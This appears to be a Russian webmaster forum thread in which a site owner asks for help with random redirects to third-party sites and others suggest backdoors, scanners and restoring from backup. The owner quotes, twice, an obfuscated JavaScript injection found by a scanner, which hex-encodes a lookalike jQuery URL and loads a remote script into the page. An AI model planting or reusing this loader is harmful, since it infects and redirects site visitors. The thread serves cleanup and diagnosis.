Редирект на "левые" сайты. Где искать проблему?
Страницы: 1
Редирект на "левые" сайты. Где искать проблему?
Здравствуйте, мой сайт med-brand.ru. Когда открываю главную страницу или какую-либо ссылку с главной страницы, иногда срабатывает переход на сторонние сайты (например - simsimply.com и games-iso.com). Как устранить проблему? Слышал нужно править файл  .htaccess, но что конкретно...раньше с этим не сталкивался...Спасибо за помощь.

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

Тут глубже копать надо! Первый вопрос, который Вы должны себе задать: кто этот файлик  .htaccess подвравил до вас, что он стал редиректить на левые сайты, и каким образом это произошло. Причин может быть много. В любом случае такой симптом весьма тревожен. Я сталкивался пару раз с таким явлением и в моём случае  это был бэк дор и шелл вирусы. Что это за гадость и как с ней бороться почитайте в инете, инфы много. Лучше, конечно, специалисту по этим вопросам показаться. Свои сайты  я сам лечил, однако тут как в трипере. Не долечишь, и всё начинается снова))).
Цитата
Вадим Бардадым пишет:
иногда срабатывает переход на сторонние сайты
Иногда - это как? При каких условиях.
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Где отдохнуть? Куда поехать? Выбирай с нами
Цитата
Вадим Бардадым пишет:
Здравствуйте, мой сайт med-brand.ru. Когда открываю главную страницу или какую-либо ссылку с главной страницы, иногда срабатывает переход на сторонние сайты (например - simsimply.com и games-iso.com). Как устранить проблему? Слышал нужно править файл .htaccess, но что конкретно...раньше с этим не сталкивался...Спасибо за помощь.
Давай за 150р реши твои проблемы с сайтом.
<p>Туры в Карпаты - дешево</p>
Скайп art_dsugar.
Цитата
Антон пишет:
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Действительно, вот результаты сканирования - sitecheck.sucuri.net/scanner/?scan=med-brand.ruНа этот код ругается антивирусник: 

Код
<script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script> <script type="text/javascript"> 
 
Пробовали удалить его с Алексей SP ( www.cy-pr.com/forum/f80/t52000/#100941 ). Не получилось, может кто подскажет как удалить или человека, который поможет.
Цитата
Coder пишет:
Иногда - это как? При каких условиях.
Условий как-таковых и нет. Переходит 1 раз за 5 кликов (примерно), в основном с главной страницы...
Цитата
Вадим Бардадым пишет:
Цитата
Антон пишет:
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Действительно, вот результаты сканирования - sitecheck.sucuri.net/scanner/?scan=med-brand.ruНа этот код ругается антивирусник:
Код
 <script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script> <script type="text/javascript"> 
  
Пробовали удалить его с Алексей SP [ www.cy-pr.com/forum/f80/t52000/#100941 ]. Не получилось, может кто подскажет как удалить или человека, который поможет.
Судя по коду у Вас полный триппер-букет в шаблоне WordPress ( wordpress.org/ )! Тут посмотрите: _www.site-security.ru/opisanie-raboty-skanera.html сканером. Sheel and Basic Backdoor Script Finder - в открытом доступе всем желающим можно скачать _www.site-security.ru/nash-pervyj-skaner.html
И следом почитать: _habrahabr.ru/company/sprinthost/blog/125839/ и взять на вооружение!
А откатить сайт из резервной копии не судьба? Вам за такие Редиректы Яндекс АГС воткнет... Ооо! И пароли смените после лечения!
Посмотреть конечно любопытно - пусть даже без денег! smile:)
ТС, то что у вас обнаружено может быть причной, но не источником заразы. Внешний не всегда можно что-либо сказать, поэтому внимательнее проверьте файлы сайта.
Если сами не справитесь стучите проверим сайт на все виды вирусов + дадим рекомендации!
Цитата
mylegnica пишет:
Судя по коду у Вас полный триппер-букет в шаблоне WordPress
У меня источником трипака явился тако же шаблон, только для Joomla. Частенько, если скачать шаблончик Бог весть откуда, можно намотать якусь гидоту.smile:) Два раза после лечения у меня случались рецидивы. Чуть до инфаркта не довели. Но когда на самом шаблоне нашёл замаскированный скрипт всё прекратилось.
ФУУУХ, НАКОНЕЦ!!!! Спасибо Всем кто участвовал, долго не мог удалить вредоносный код на сайте! После длительного поиска специалиста, нашел в сети Алексея ( skype - [SIZE=2]doktorsaitov)[/SIZE], Алексей справился с задачей на все 100%, проделал большую и кропотливую работу, источником заразы оказался плагин, причем были вкрапления в functions.php + пошел на встречу в плане цены, за что я ему очень благодарен! Рекомендую всем и буду обращаться сам!!!
Да...Кому нужна помощь, на этом форуме он находится по ссылке: www.cy-pr.com/people/114017/
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
16:23 Поднять ИКС 
14:09 CPA-сеть MyLead - глобальная монетизация трафика! 
14:04 Захват ТОПА выдачи 
00:49 Аффилиаты сайта 
20:10 Нет посетителей 
20:07 Монетизируем 100% adult траффика без остатков. 
18:59 Главная пропадает из выдачи, однако яндекс пишет что она там. 
16:37 Аккаунты Яндекс Директ и Google Adwords без НДС. Экономия 18% рекламного бюджета, Пополнение с любых карт РФ 
15:58 ВК Целевая аудитория в вашу группу/живые реальные пользователи! Не офферы/боты. Без банов и списаний. Гарантия! 
13:31 Продам сайт "Советы старого фарцовщика" 
13:15 AML24 – мгновенный перевод в фиат вашей криптовалюты 
11:51 Куплю адалт сайты 
04:12 Напишу для вас тексты 
04:10 Напишу тексты на азартную тематику для бирж ссылок 
16:44 в это воскресенье 17.10 с 18:00 до 21:00 приглашаю сходить в Бизнес- Баню. 
03:54 Украсть ворованное. Дилемма. 
13:18 Кидала, Кидок, Кидало 
21:55 Yoast SEO WP 
19:50 Комплексное продвижение в Instagram 
18:59 Услуги по внутренней оптимизации сайтов 
17:35 Слив курса Как получать дополнительно 20 000 рублей в месяц